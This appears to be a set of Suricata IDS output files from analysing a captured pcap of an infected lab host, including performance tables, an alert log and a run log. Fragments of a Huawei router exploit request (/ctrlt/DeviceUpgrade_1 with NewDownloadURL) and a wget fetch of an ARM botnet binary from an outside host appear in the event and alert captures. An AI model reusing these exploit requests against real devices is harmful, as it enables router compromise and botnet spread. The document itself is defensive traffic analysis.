{"timestamp":"2019-09-19T08:08:20.755667+0000","flow_id":1018522357801610,"event_type":"fileinfo","src_ip":"192.168.122.105","src_port":57628,"dest_ip":"156.227.240.156","dest_port":37215,"proto":"TCP","http":{"url":"\/ctrlt\/DeviceUpgrade_1","http_method":"POST","protocol":"HTTP\/1.1","length":0},"app_proto":"http","fileinfo":{"filename":"\/ctrlt\/DeviceUpgrade_1","gaps":false,"state":"CLOSED","stored":false,"size":430,"tx_id":0}}
{"timestamp":"2019-09-19T08:08:20.755667+0000","flow_id":1443790692724091,"event_type":"http","src_ip":"192.168.122.105","src_port":37460,"dest_ip":"156.241.113.204","dest_port":37215,"proto":"TCP","tx_id":0,"http":{"url":"\/ctrlt\/DeviceUpgrade_1"}}
{"timestamp":"2019-09-19T08:08:20.755667+0000","flow_id":1443790692724091,"event_type":"http","src_ip":"192.168.122.105","src_port":37460,"dest_ip":"156.241.113.204","dest_port":37215,"proto":"TCP","tx_id":1,"http":{"url":"HUAWEIUPNP)<\/NewDownloadURL><\/u:Upgrade><\/s:Body><\/s:Envelope>"}}
{"timestamp":"2019-09-19T08:08:20.755667+0000","flow_id":1443790692724091,"event_type":"fileinfo","src_ip":"192.168.122.105","src_port":37460,"dest_ip":"156.241.113.204","dest_port":37215,"proto":"TCP","http":{"url":"\/ctrlt\/DeviceUpgrade_1","http_method":"POST","protocol":"HTTP\/1.1","length":0},"app_proto":"http","fileinfo":{"filename":"\/ctrlt\/DeviceUpgrade_1","gaps":false,"state":"CLOSED","stored":false,"size":430,"tx_id":0}}
{"timestamp":"2019-09-19T08:08:20.7

This file has been truncated.


keyword_perf.log - (12518 bytes)
  --------------------------------------------------------------------------------------------------------------------------------
  Date: 9/23/2019 -- 11:17:10
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: total
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flow             5776742         600             600             2220814         9627.00         9627.00         0.00           
  threshold        100016          6               6               25578           16669.00        16669.00        0.00           
  content          9426096         1242            188             431378          7589.00         6720.00         7744.00        
  pcre             1030144         16              4               749392          64384.00        35506.00        74009.00       
  byte_test        138130          23              8               36242           6005.00         4503.00         6807.00        
  flowbits         346036          61              17              22004           5672.00         7853.00         4830.00        
  urilen           162472          30              10              20242           5415.00         5092.00         5577.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flow             5776742         600             600             2220814         9627.00         9627.00         0.00           
  flowbits         217550          45              1               7254            4834.00         5024.00         4830.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet/stream payload
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          3254598         494             8               75812           6588.00         25078.00        6283.00        
  byte_test        138130          23              8               36242           6005.00         4503.00         6807.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: post-match
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flowbits         128486          16              16              22004           8030.00         8030.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: threshold
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  threshold        100016          6               6               25578           16669.00        16669.00        0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_uri
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          1045280         200             31              20542           5226.00         5238.00         5224.00        
  pcre             916638          11              1               749392          83330.00        71088.00        84555.00       
  urilen           162472          30              10              20242           5415.00         5092.00         5577.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_client_body
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          1878610         195             0               431378          9633.00         0.00            9633.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_response_line
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          5830            1               0               5830            5830.00         0.00            5830.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: file_data
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          1085998         48              1               292908          22624.00        6650.00         22964.00       
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          1496988         187             98              425420          8005.00         6218.00         9972.00        
  pcre             99104           4               2               30796           24776.00        28268.00        21284.00       
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header_names
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          393660          70              14              21350           5623.00         5920.00         5549.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_content_len
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          168566          30              30              7176            5618.00         5618.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_method
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          11054           2               2               5916            5527.00         5527.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_user_agent
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          74840           13              2               15724           5756.00         5560.00         5792.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_host
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  pcre             14402           1               1               14402           14402.00        14402.00        0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_stat_code
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          10672           2               2               5700            5336.00         5336.00         0.00           


suricata-4.0.0-etpro-all-alert-2019-09-23-T-11-17-10-09232019.1116-pcap_6.pcap.txt - (1666 bytes)
09/19/2019-08:07:12.685917  [**] [1:2025125:1] ET INFO ARM7 File Download Request from IP Address [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 192.168.122.105:53098 -> 192.236.178.80:80
09/19/2019-08:07:12.781794  [**] [1:2019240:14] ET POLICY Executable and linking format (ELF) file download Over HTTP [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 192.236.178.80:80 -> 192.168.122.105:53098
09/19/2019-08:07:13.416654  [**] [1:2400000:2652] ET DROP Spamhaus DROP Listed Traffic Inbound group 1 [**] [Classification: Misc Attack] [Priority: 2] {TCP} 5.157.42.154:52869 -> 192.168.122.105:53291
09/19/2019-08:07:38.336714  [**] [1:2400012:2652] ET DROP Spamhaus DROP Listed Traffic Inbound group 13 [**] [Classification: Misc Attack] [Priority: 2] {TCP} 161.0.7.66:52869 -> 192.168.122.105:53291
09/19/2019-08:07:52.717056  [**] [1:2400015:2652] ET DROP Spamhaus DROP Listed Traffic Inbound group 16 [**] [Classification: Misc Attack] [Priority: 2] {TCP} 181.177.97.189:52869 -> 192.168.122.105:53291
09/19/2019-08:08:05.373812  [**] [1:2400012:2652] ET DROP Spamhaus DROP Listed Traffic Inbound group 13 [**] [Classification: Misc Attack] [Priority: 2] {ICMP} 160.124.224.70:3 -> 192.168.122.105:10
09/19/2019-08:08:14.165663  [**] [1:2400005:2652] ET DROP Spamhaus DROP Listed Traffic Inbound group 6 [**] [Classification: Misc Attack] [Priority: 2] {TCP} 107.182.246.15:52869 -> 192.168.122.105:53291
09/19/2019-08:08:18.021446  [**] [1:2400012:2652] ET DROP Spamhaus DROP Listed Traffic Inbound group 13 [**] [Classification: Misc Attack] [Priority: 2] {TCP} 160.124.82.153:52869 -> 192.168.122.105:53291


suricata-4.0.0-etpro-all-perf.txt-2019-09-23-T-11-17-10-09232019.1116-pcap_6.pcap.txt - (22486 bytes)
  --------------------------------------------------------------------------
  Date: 9/23/2019 -- 11:17:10. Sorted by: max ticks.
  --------------------------------------------------------------------------
   Num      Rule         Gid      Rev      Ticks        %      Checks   Matches  Max Ticks   Avg Ticks   Avg Match   Avg No Match
  -------- ------------ -------- -------- ------------ ------ -------- -------- ----------- ----------- ----------- -------------- 
  1        2003068      1        7        188441078    6.75   33640    0        15419818    5601.70     0.00        5601.70    
  2        2010938      1        3        178835764    6.41   33640    0        12771154    5316.16     0.00        5316.16    
  3        2024228      1        3        12972760     0.46   4        0        12669282    3243190.00  0.00        3243190.00 
  4        2002992      1        7        169175786    6.06   33640    0        10807166    5029.01     0.00        5029.01    
  5        2102523      1        8        166907892    5.98   33897    0        7329838     4923.97     0.00        4923.97    
  6        2002994      1        7        172266256    6.17   33640    0        7244224     5120.88     0.00        5120.88    
  7        2010939      1        3        169391954    6.07   33640    0        7121258     5035.43     0.00        5035.43    
  8        2002993      1        7        171861394    6.16   33640    0        6864106     5108.84     0.00        5108.84    
  9        2001580      1        15       164663772    5.90   33640    0        6729932     4894.88     0.00        4894.88    
  10       2013506      1        1        166403494    5.96   33640    0        6727608     4946.60     0.00        4946.60    
  11       2102523      1        8        215783956    7.73   44857    0        2524096     4810.49     0.00        4810.49    
  12       2024909      1        2        2451018      0.09   7        0        2251948     350145.43   0.00        350145.43  
  13       2025441      1        2        1289002      0.05   10       0        808030      128900.20   0.00        128900.20  
  14       2007880      1        7        828346       0.03   11       0        467634      75304.18    0.00        75304.18   
  15       2825905      1        2        1541706      0.06   31       0        466416      49732.45    0.00        49732.45   
  16       2015872      1        6        2299024      0.08   31       0        462716      74162.06    0.00        74162.06   
  17       2017552      1        6        2860526      0.10   67       0        460284      42694.42    0.00        42694.42   
  18       2016537      1        2        2142688      0.08   56       0        455910      38262.29    0.00        38262.29   
  19       2816454      1        2        2334556      0.08   41       0        454978      56940.39    0.00        56940.39   
  20       2022502      1        4        1903574      0.07   42       0        452790      45323.19    0.00        45323.19   
  21       2020936      1        3        1845960      0.07   41       0        451350      45023.41    0.00        45023.41   
  22       2807559      1        2        3883750      0.14   171      0        444050      22711.99    0.00        22711.99   
  23       2001582      1        15       159765084    5.72   33640    0        438700      4749.26     0.00        4749.26    
  24       2001219      1        20       158189528    5.67   33640    0        433428      4702.42     0.00        4702.42    
  25       2809816      1        2        634204       0.02   41       0        424782      15468.39    0.00        15468.39   
  26       2103072      1        3        578208       0.02   31       0        424068      18651.87    0.00        18651.87   
  27       2016683      1        2        675446       0.02   40       0        422470      16886.15    0.00        16886.15   
  28       2013926      1        8        644508       0.02   41       0        420594      15719.71    0.00        15719.71   
  29       2820157      1        2        323740       0.01   1        0        323740      323740.00   0.00        323740.00  
  30       2820158      1        2        321960       0.01   1        0        321960      321960.00   0.00        321960.00  
  31       2806561      1        5        162877216    5.84   33640    0        320760      4841.77     0.00        4841.77    
  32       2804911      1        3        293896       0.01   1        0        293896      293896.00   0.00        293896.00  
  33       2815174      1        3        1588086      0.06   41       0        230152      38733.80    0.00        38733.80   
  34       2002995      1        10       159546454    5.72   33640    0        190728      4742.76     0.00        4742.76    
  35       2024240      1        2        164576       0.01   1        1        164576      164576.00   164576.00   0.00       
  36       2002910      1        6        157881316    5.66   33640    0        121426      4693.26     0.00        4693.26    
  37       2816356      1        2        2357880      0.08   42       0        117904      56140.00    0.00        56140.00   
  38       2828803      1        2        90702        0.00   1        0        90702       90702.00    0.00        90702.00   
  39       2804927      1        2        86848        0.00   1        0        86848       86848.00    0.00        86848.00   
  40       2808314      1        4        649996       0.02   10       0        82364       64999.60    0.00        64999.60   
  41       2021067      1        2        82266        0.00   1        1        82266       82266.00    82266.00    0.00       
  42       2822979      1        3        79592        0.00   1        0        79592       79592.00    0.00        79592.00   
  43       2002911      1        6        158113798    5.66   33640    0        77786       4700.17     0.00        4700.17    
  44       2025178      1        2        619822       0.02   10       0        77030       61982.20    0.00        61982.20   
  45       2025119      1        3        600924       0.02   10       0        71986       60092.40    0.00        60092.40   
  46       2024771      1        1        425302       0.02   44       0        70654       9665.95     0.00        9665.95    
  47       2825235      1        2        65722        0.00   1        0        65722       65722.00    0.00        65722.00   
  48       2025125      1        1        64986        0.00   1        1        64986       64986.00    64986.00    0.00       
  49       2802987      1        5        63876        0.00   1        0        63876       63876.00    0.00        63876.00   
  50       2020295      1        6        478666       0.02   10       0        62654       47866.60    0.00        47866.60   
  51       2801929      1        7        62640        0.00   1        0        62640       62640.00    0.00        62640.00   
  52       2815254      1        7        519788       0.02   10       0        62450       51978.80    0.00        51978.80   
  53       2802991      1        5        119694       0.00   2        0        61766       59847.00    0.00        59847.00   
  54       2019240      1        14       59816        0.00   1        1        59816       59816.00    59816.00    0.00       
  55       2804907      1        3        59628        0.00   1        0        59628       59628.00    0.00        59628.00   
  56       2801930      1        7        58854        0.00   1        0        58854       58854.00    0.00        58854.00   
  57       2830124      1        1        58602        0.00   1        0        58602       58602.00    0.00        58602.00   
  58       2816492      1        3        1454778      0.05   41       0        56806       35482.39    0.00        35482.39   
  59       2014519      1        7        52478        0.00   1        0        52478       52478.00    0.00        52478.00   
  60       2821615      1        2        48730        0.00   1        0        48730       48730.00    0.00        48730.00   
  61       2816619      1        2        366826       0.01   42       0        48580       8733.95     0.00        8733.95    
  62       2823166      1        3        47722        0.00   1        0        47722       47722.00    0.00        47722.00   
  63       2829644      1        1        47496        0.00   1        0        47496       47496.00    0.00        47496.00   
  64       2820972      1        2        46836        0.00   1        1        46836       46836.00    46836.00    0.00       
  65       2827279      1        5        102198       0.00   11       0        46490       9290.73     0.00        9290.73    
  66       2013186      1        19       46216        0.00   1        0        46216       46216.00    0.00        46216.00   
  67       2025162      1        2        46174        0.00   1        0        46174       46174.00    0.00        46174.00   
  68       2828008      1        2        95342        0.00   11       0        45050       8667.45     0.00        8667.45    
  69       2828876      1        1        1986586      0.07   385      0        43640       5159.96     0.00        5159.96    
  70       2814886      1        1        4188846      0.15   229      0        42946       18291.90    0.00        18291.90   
  71       2816165      1        5        42606        0.00   1        0        42606       42606.00    0.00        42606.00   
  72       2012707      1        5        41712        0.00   1        0        41712       41712.00    0.00        41712.00   
  73       2019345      1        2        251154       0.01   10       0        41444       25115.40    0.00        25115.40   
  74       2025124      1        1        39302        0.00   1        0        39302       39302.00    0.00        39302.00   
  75       2810793      1        5        1016854      0.04   189      0        38578       5380.18     0.00        5380.18    
  76       2020557      1        2        37156        0.00   1        0        37156       37156.00    0.00        37156.00   
  77       2013382      1        3        36978        0.00   1        0        36978       36978.00    0.00        36978.00   
  78       2014956      1        1        64656        0.00   2        0        36822       32328.00    0.00        32328.00   
  79       2830035      1        2        36494        0.00   1        0        36494       36494.00    0.00        36494.00   
  80       2826256      1        2        36338        0.00   1        0        36338       36338.00    0.00        36338.00   
  81       2809267      1        8        35970        0.00   1        0        35970       35970.00    0.00        35970.00   
  82       2809231      1        1        921018       0.03   171      0        35782       5386.07     0.00        5386.07    
  83       2810481      1        4        35470        0.00   1        0        35470       35470.00    0.00        35470.00   
  84       2022197      1        3        35438        0.00   1        0        35438       35438.00    0.00        35438.00   
  85       2829579      1        1        209656       0.01   31       0        35392       6763.10     0.00        6763.10    
  86       2829607      1        1        35172        0.00   1        0        35172       35172.00    0.00        35172.00   
  87       2024829      1        2        100664       0.00   3        0        34626       33554.67    0.00        33554.67   
  88       2806802      1        2        226470       0.01   7        0        34620       32352.86    0.00        32352.86   
  89       2016502      1        2        195228       0.01   8        0        27898       24403.50    0.00        24403.50   
  90       2016143      1        3        50178        0.00   2        0        27094       25089.00    0.00        25089.00   
  91       2100540      1        12       68066        0.00   6        0        26338       11344.33    0.00        11344.33   
  92       2016948      1        2        26096        0.00   1        0        26096       26096.00    0.00        26096.00   
  93       2806857      1        2        169310       0.01   31       0        26032       5461.61     0.00        5461.61    
  94       2022331      1        3        487376       0.02   97       0        25750       5024.49     0.00        5024.49    
  95       2807130      1        4        24944        0.00   1        0        24944       24944.00    0.00        24944.00   
  96       2819694      1        2        24748        0.00   1        0        24748       24748.00    0.00        24748.00   
  97       2014958      1        1        40656        0.00   2        0        24736       20328.00    0.00        20328.00   
  98       2820003      1        2        24642        0.00   1        0        24642       24642.00    0.00        24642.00   
  99       2024650      1        1        48844        0.00   2        0        24604       24422.00    0.00        24422.00   
  100      2809306      1        4        47450        0.00   2        0        24440       23725.00    0.00        23725.00   
  101      2024929      1        1        24340        0.00   1        0        24340       24340.00    0.00        24340.00   
  102      2828966      1        1        93086        0.00   4        0        24190       23271.50    0.00        23271.50   
  103      2017748      1        6        24162        0.00   1        0        24162       24162.00    0.00        24162.00   
  104      2014473      1        5        24086        0.00   1        0        24086       24086.00    0.00        24086.00   
  105      2016503      1        2        182724       0.01   8        0        23944       22840.50    0.00        22840.50   
  106      2023510      1        2        863484       0.03   171      0        22492       5049.61     0.00        5049.61    
  107      2804587      1        2        216778       0.01   41       0        21716       5287.27     0.00        5287.27    
  108      2811445      1        4        226274       0.01   41       0        21142       5518.88     0.00        5518.88    
  109      2023016      1        1        196492       0.01   32       0        20718       6140.38     0.00        6140.38    
  110      2828877      1        1        314868       0.01   58       0        20516       5428.76     0.00        5428.76    
  111      2100474      1        5        287522       0.01   56       0        20242       5134.32     0.00        5134.32    
  112      2014380      1        4        1202050      0.04   229      0        20134       5249.13     0.00        5249.13    
  113      2008420      1        4        1170616      0.04   223      0        19994       5249.40     0.00        5249.40    
  114      2001330      1        8        464398       0.02   92       0        18160       5047.80     0.00        5047.80    
  115      2102330      1        3        160400       0.01   31       0        11560       5174.19     0.00        5174.19    
  116      2016364      1        1        302994       0.01   58       0        10046       5224.03     0.00        5224.03    
  117      2810792      1        5        887664       0.03   189      0        9396        4696.63     0.00        4696.63    
  118      2100719      1        8        31938        0.00   5        0        8712        6387.60     0.00        6387.60    
  119      2002823      1        11       8004         0.00   1        0        8004        8004.00     0.00        8004.00    
  120      2025132      1        2        57540        0.00   10       0        7888        5754.00     0.00        5754.00    
  121      2020661      1        3        13718        0.00   2        0        7796        6859.00     0.00        6859.00    
  122      2809481      1        1        200650       0.01   40       0        7560        5016.25     0.00        5016.25    
  123      2022330      1        2        456524       0.02   93       0        7040        4908.86     0.00        4908.86    
  124      2024287      1        2        152742       0.01   31       0        6880        4927.16     0.00        4927.16    
  125      2827580      1        7        2

This file has been truncated.


unified2.alert.1569237422 - (7189 bytes) - download
[binary unified2 alert record data not rendered; printable strings recovered from the captured payload follow]

GET /dark_bins/dark.arm7 HTTP/1.1
User-Agent: Wget/1.19.4 (linux-gnueabihf)
Accept: */*
Accept-Encoding: identity
Host: 192.236.178.80
Connection: Keep-Alive

PROT_EXEC|PROT_WRITE failed.

$Info: This file is packed with the UPX executable packer http://upx.sf.net $
$Id: UPX 3.94 Copyright (


suricata-report-2019-09-23-T-11-17-10-09232019.1116-pcap_6.pcap.txt - (17762 bytes) - download
lastcmd:ulimit -c unlimited; /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etpro/suricata400-etpro-all.yaml -l /var/www/html/e50b5b64c5f3331deb0fb67bc7c285a556b33745cb75ec8c950e11a498e082d2 -r /var/pcap/09232019.1116-pcap_6.pcap -vvv -k none
elapsedtime:30.323215
stderr:
stdout:
23/9/2019 -- 11:16:40 - <Info> - Configuration node 'rule-files' redefined.
23/9/2019 -- 11:16:40 - <Notice> - This is Suricata version 4.0.0 RELEASE
23/9/2019 -- 11:16:40 - <Info> - CPUs/cores online: 1
23/9/2019 -- 11:16:40 - <Config> - 'default' server has 'request-body-minimal-inspect-size' set to 32754 and 'request-body-inspect-window' set to 15749 after randomization.
23/9/2019 -- 11:16:40 - <Config> - 'default' server has 'response-body-minimal-inspect-size' set to 32916 and 'response-body-inspect-window' set to 16755 after randomization.
23/9/2019 -- 11:16:40 - <Config> - DNS request flood protection level: 500
23/9/2019 -- 11:16:40 - <Config> - DNS per flow memcap (state-memcap): 524288
23/9/2019 -- 11:16:40 - <Config> - DNS global memcap: 16777216
23/9/2019 -- 11:16:40 - <Config> - allocated 262144 bytes of memory for the host hash... 4096 buckets of size 64
23/9/2019 -- 11:16:40 - <Config> - preallocated 1000 hosts of size 136
23/9/2019 -- 11:16:40 - <Config> - host memory usage: 398144 bytes, maximum: 16777216
23/9/2019 -- 11:16:40 - <Config> - using magic-file /usr/share/file/magic
23/9/2019 -- 11:16:40 - <Config> - Core dump size is unlimited.
23/9/2019 -- 11:16:40 - <Config> - allocated 3670016 bytes of memory for the defrag hash... 65536 buckets of size 56
23/9/2019 -- 11:16:40 - <Config> - preallocated 1000 defrag trackers of size 168
23/9/2019 -- 11:16:40 - <Config> - defrag memory usage: 3838016 bytes, maximum: 33554432
23/9/2019 -- 11:16:40 - <Config> - stream "prealloc-sessions": 2048 (per thread)
23/9/2019 -- 11:16:40 - <Config> - stream "memcap": 33554432
23/9/2019 -- 11:16:40 - <Config> - stream "midstream" session pickups: disabled
23/9/2019 -- 11:16:40 - <Config> - stream "async-oneside": disabled
23/9/2019 -- 11:16:40 - <Config> - stream "checksum-validation": disabled
23/9/2019 -- 11:16:40 - <Config> - stream."inline": disabled
23/9/2019 -- 11:16:40 - <Config> - stream "bypass": disabled
23/9/2019 -- 11:16:40 - <Config> - stream "max-synack-queued": 5
23/9/2019 -- 11:16:40 - <Config> - stream.reassembly "memcap": 134217728
23/9/2019 -- 11:16:40 - <Config> - stream.reassembly "depth": 0
23/9/2019 -- 11:16:40 - <Config> - stream.reassembly "toserver-chunk-size": 2682
23/9/2019 -- 11:16:40 - <Config> - stream.reassembly "toclient-chunk-size": 2522
23/9/2019 -- 11:16:40 - <Config> - stream.reassembly.raw: enabled
23/9/2019 -- 11:16:40 - <Config> - stream.reassembly "segment-prealloc": 2048
23/9/2019 -- 11:16:40 - <Config> - Delayed detect disabled
23/9/2019 -- 11:16:40 - <Config> - pattern matchers: MPM: ac, SPM: bm
23/9/2019 -- 11:16:40 - <Config> - grouping: tcp-whitelist (default) 53, 80, 139, 443, 445, 1433, 3306, 3389, 6666, 6667, 8080
23/9/2019 -- 11:16:40 - <Config> - grouping: udp-whitelist (default) 53, 135, 5060
23/9/2019 -- 11:16:40 - <Config> - prefilter engines: MPM
23/9/2019 -- 11:16:40 - <Config> - IP reputation disabled
23/9/2019 -- 11:16:40 - <Perf> - Registered 148 keyword profiling counters.
23/9/2019 -- 11:16:40 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-ftp.rules
23/9/2019 -- 11:16:40 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-policy.rules
23/9/2019 -- 11:16:40 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-trojan.rules
23/9/2019 -- 11:16:45 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-games.rules
23/9/2019 -- 11:16:45 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-pop3.rules
23/9/2019 -- 11:16:45 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-user_agents.rules
23/9/2019 -- 11:16:45 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-activex.rules
23/9/2019 -- 11:16:45 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-rpc.rules
23/9/2019 -- 11:16:45 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-attack_response.rules
23/9/2019 -- 11:16:45 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-icmp.rules
23/9/2019 -- 11:16:45 - <Config> - No rules loaded from ET-icmp.rules.
23/9/2019 -- 11:16:45 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-scan.rules
23/9/2019 -- 11:16:45 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-voip.rules
23/9/2019 -- 11:16:45 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-chat.rules
23/9/2019 -- 11:16:45 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-icmp_info.rules
23/9/2019 -- 11:16:45 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-info.rules
23/9/2019 -- 11:16:45 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-shellcode.rules
23/9/2019 -- 11:16:45 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_client.rules
23/9/2019 -- 11:16:46 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-imap.rules
23/9/2019 -- 11:16:46 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_server.rules
23/9/2019 -- 11:16:46 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-current_events.rules
23/9/2019 -- 11:16:49 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-inappropriate.rules
23/9/2019 -- 11:16:49 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-smtp.rules
23/9/2019 -- 11:16:49 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_specific_apps.rules
23/9/2019 -- 11:16:51 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-deleted.rules
23/9/2019 -- 11:16:51 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-malware.rules
23/9/2019 -- 11:16:51 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-snmp.rules
23/9/2019 -- 11:16:51 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-worm.rules
23/9/2019 -- 11:16:51 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dns.rules
23/9/2019 -- 11:16:51 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-misc.rules
23/9/2019 -- 11:16:51 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-sql.rules
23/9/2019 -- 11:16:51 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dos.rules
23/9/2019 -- 11:16:51 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-netbios.rules
23/9/2019 -- 11:16:52 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-telnet.rules
23/9/2019 -- 11:16:52 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-exploit.rules
23/9/2019 -- 11:16:52 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-p2p.rules
23/9/2019 -- 11:16:52 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-tftp.rules
23/9/2019 -- 11:16:52 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-mobile_malware.rules
23/9/2019 -- 11:16:53 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-botcc.rules
23/9/2019 -- 11:16:53 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-compromised.rules
23/9/2019 -- 11:16:53 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-drop.rules
23/9/2019 -- 11:16:53 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dshield.rules
23/9/2019 -- 11:16:53 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-tor.rules
23/9/2019 -- 11:16:53 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-ciarmy.rules
23/9/2019 -- 11:16:53 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/local.rules
23/9/2019 -- 11:16:53 - <Config> - No rules loaded from local.rules.
23/9/2019 -- 11:16:53 - <Info> - 44 rule files processed. 39585 rules successfully loaded, 0 rules failed
23/9/2019 -- 11:16:53 - <Info> - Threshold config parsed: 0 rule(s) found
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for tcp-packet
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for tcp-stream
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for udp-packet
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for other-ip
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_uri
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_request_line
